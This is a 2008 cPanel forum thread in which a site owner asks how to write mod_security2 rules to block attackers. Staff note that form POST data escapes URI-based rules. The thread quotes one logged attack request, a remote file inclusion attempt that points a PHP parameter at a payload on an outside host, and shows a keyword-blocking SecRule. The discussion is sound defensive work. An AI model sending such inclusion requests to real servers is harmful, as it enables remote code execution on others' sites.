Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

HOW: Create my own mod_security2 rules?

Discussion in 'Security' started by SuperBaby, Jan 20, 2008.

  1. SuperBaby

    SuperBaby Well-Known Member

    Joined:
    Nov 27, 2003
    Messages:
    336
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    Thailand
    cPanel Access Level:
    Website Owner
    Twitter:
    I checked my mod_security2 log file and see a lot of entries similar to this:

    GET /myfolder1/main.php?id=http://submitstation.de/xxxxxx/cmd.jpg

    How do I set up a mod_security2 rule so that the hacker is stopped when:

    1) He points his browser to my URL and the URL contain a specific word. In the above case, I would ban "submitstation.de".

    2) He submits a form from my site and the content contains a specific word.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
    #1 SuperBaby, Jan 20, 2008
  2. cPDan

    cPDan cPanel Staff
    Staff Member

    Joined:
    Mar 9, 2004
    Messages:
    716
    Likes Received:
    8
    Trophy Points:
    243
    #2 cPDan, Jan 21, 2008
  3. SuperBaby

    SuperBaby Well-Known Member

    Joined:
    Nov 27, 2003
    Messages:
    336
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    Thailand
    cPanel Access Level:
    Website Owner
    Twitter:
    SecRule "REQUEST_URI|QUERY_STRING" "aaa|bbb"

    I added the rule above to mod_security2. It successfully forbid the access if the URL contains aaa or bbb. But it does not prevent aaa and bbb from a submission form.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
    #3 SuperBaby, Jan 21, 2008
  4. cPDan

    cPDan cPanel Staff
    Staff Member

    Joined:
    Mar 9, 2004
    Messages:
    716
    Likes Received:
    8
    Trophy Points:
    243
    a form, at least via POSt is not part of the URI or QUERY_STRING, your best bet is to ask the mod security folks how to filter POST requests
     
    #4 cPDan, Jan 21, 2008
  5. SuperBaby

    SuperBaby Well-Known Member

    Joined:
    Nov 27, 2003
    Messages:
    336
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    Thailand
    cPanel Access Level:
    Website Owner
    Twitter:
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
    #5 SuperBaby, Jan 21, 2008
(You must log in or sign up to post here.)
Loading...
Similar Threads - Create mod_security2 rules
  1. DucNghia

    Create aliases via API?

    DucNghia, Sep 19, 2018 at 2:04 AM, in forum: cPanel Developers
    Replies:
    1
    Views:
    33
    cPanelLauren
    Sep 19, 2018 at 12:38 PM
  2. dswimr615

    /scripts/createacct with select variables

    dswimr615, Sep 17, 2018 at 4:12 PM, in forum: General Discussion
    Replies:
    1
    Views:
    32
    cPanelLauren
    Sep 18, 2018 at 10:03 AM
  3. ebizindia

    Create a full copy of an account

    ebizindia, Sep 14, 2018 at 8:02 AM, in forum: Data Protection
    Replies:
    2
    Views:
    46
    cPanelLauren
    Sep 14, 2018 at 12:00 PM
  4. webdsn

    Can I create monitor user?

    webdsn, Sep 12, 2018, in forum: General Discussion
    Replies:
    5
    Views:
    74
    cPanelMichael
    Sep 17, 2018 at 9:07 AM
  5. ImperialTrader

    Create Reseller Package via WHMCS?

    ImperialTrader, Sep 9, 2018, in forum: General Discussion
    Replies:
    7
    Views:
    74
    Infopro
    Sep 12, 2018

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Accept Learn More...
    Dismiss Notice